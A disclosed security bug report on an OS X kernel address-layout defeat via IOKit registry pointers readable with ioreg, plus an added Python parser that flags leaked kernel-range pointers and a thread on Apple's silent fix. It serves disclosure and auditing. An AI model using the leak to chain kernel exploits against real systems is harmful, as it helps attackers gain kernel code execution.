OS X kASLR defeat due to kernel pointers in IOKit registry

Reported by ianbeer@google.com (Project Member), Oct 15 2014
$ ioreg -lxf | grep 7fffffff
| | | | | | "AAPL,iokit-ndrv" = <f07c3a8c7fffffff>
| | | | | | | "AAPL,iokit-ndrv" = <f07c3a8c7fffffff>
| | | | | | | "AAPL,iokit-ndrv" = <f07c3a8c7fffffff>
| | | | | | | "AAPL,iokit-ndrv" = <f07c3a8c7fffffff>
| | | | | | | "AAPL,iokit-ndrv" = <f07c3a8c7fffffff>
| | | | | "AAPL,iokit-ndrv" = <f07c3a8c7fffffff>
That's an IOKit vtable pointer. Read access to the IOKit registry isn't currently preventable by the OS X sandboxing mechanism so any process on OS X can read *all* the information in there.
PoC exploit attached which uses this kASLR defeat along with https://code.google.com/p/google-security-research/issues/detail?id=40 to get reliable kernel code execution.
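As an added audit check (not part of the original report or its attached PoC): a small parser that reads `ioreg -lxf` style lines, decodes each `<...>` data blob as raw little-endian bytes, and flags any 8-byte word that falls in the kernel's address range, which is exactly the kind of value the grep above surfaces. The sample lines and the address threshold are constructed assumptions, labelled as such in the code.

```python
import re
import struct

# Constructed sample of `ioreg -lxf` output, modelled on the lines in the report (not captured from a real host).
SAMPLE_IOREG = """\
| | | | | | "AAPL,iokit-ndrv" = <f07c3a8c7fffffff>
| | | | | "IOClass" = "ExampleDriver"
| | | | | "IOProbeScore" = 0x0
| | | | | "Example-blob" = <0102030405060708>
"""

# Assumption: on a 64-bit OS X kernel of this era, kexts map just below 0xffffff8000000000 and the kernel
# itself above it, so any 8-byte word at or above this threshold is treated as a candidate kernel pointer.
KERNEL_VA_MIN = 0xffffff7f00000000

# Matches `"key" = <hexbytes>`; string and integer properties (`"..."`, `0x...`) are deliberately skipped.
LINE_RE = re.compile(r'"(?P<key>[^"]+)"\s*=\s*<(?P<hex>[0-9a-fA-F]+)>')


def decode_words(blob_hex):
    """Split a hex data blob into 8-byte little-endian words (trailing partial word ignored)."""
    data = bytes.fromhex(blob_hex)
    return [struct.unpack_from('<Q', data, off)[0] for off in range(0, len(data) - 7, 8)]


def find_kernel_pointers(ioreg_text):
    """Return [(property_key, address), ...] for every blob word in the kernel address range.

    `ioreg -lxf` prints data properties in memory order, so the 8-byte pointer stored as
    f0 7c 3a 8c 7f ff ff ff is the address 0xffffff7f8c3a7cf0; that is why the report's
    `grep 7fffffff` catches it.
    """
    hits = []
    for line in ioreg_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        for value in decode_words(m.group('hex')):
            if value >= KERNEL_VA_MIN:
                hits.append((m.group('key'), value))
    return hits


if __name__ == '__main__':
    for key, addr in find_kernel_pointers(SAMPLE_IOREG):
        print(f'{key}: leaked kernel-range pointer 0x{addr:016x}')
```

Feeding real `ioreg -lxf` output to `find_kernel_pointers` gives a quick audit of whether a host still exposes such pointers to unprivileged readers.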
Comment 1 by ianbeer@google.com (Project Member), Oct 15 2014

Oct 31 2014
I think this might have been fixed in Yosemite. Apple haven't replied to my bug report yet but I'm gonna ping them to see if this was silently fixed. If so I'll mark this bug as invalid and open it up (along with the exploit).
Nov 1 2014

@ianbeer: I wonder what the right thing to do here is? Is Mavericks still supported? If so, I would expect this report to be subject to a 90-day deadline for Apple to fix this issue in their still-supported OS version. Apple would then have 90 days to either:
- Patch Mavericks.
- Desupport Mavericks in support of Yosemite.
Nov 8 2014

Apple confirmed that they did indeed fix this in 10.10. Regarding supported versions of OS X, I don't think there is such a concept. Mavericks did receive a security update when Yosemite was released but it only had patches for POODLE. It did not contain patches for any of the other externally reported bugs fixed in Yosemite, and clearly also didn't contain patches for the silently fixed bugs (such as this) either. I would argue that's equivalent to no longer supporting Mavericks. It's trivial to bindiff the patched drivers and find these bugs, therefore I'm marking this bug report as invalid and removing the view restriction.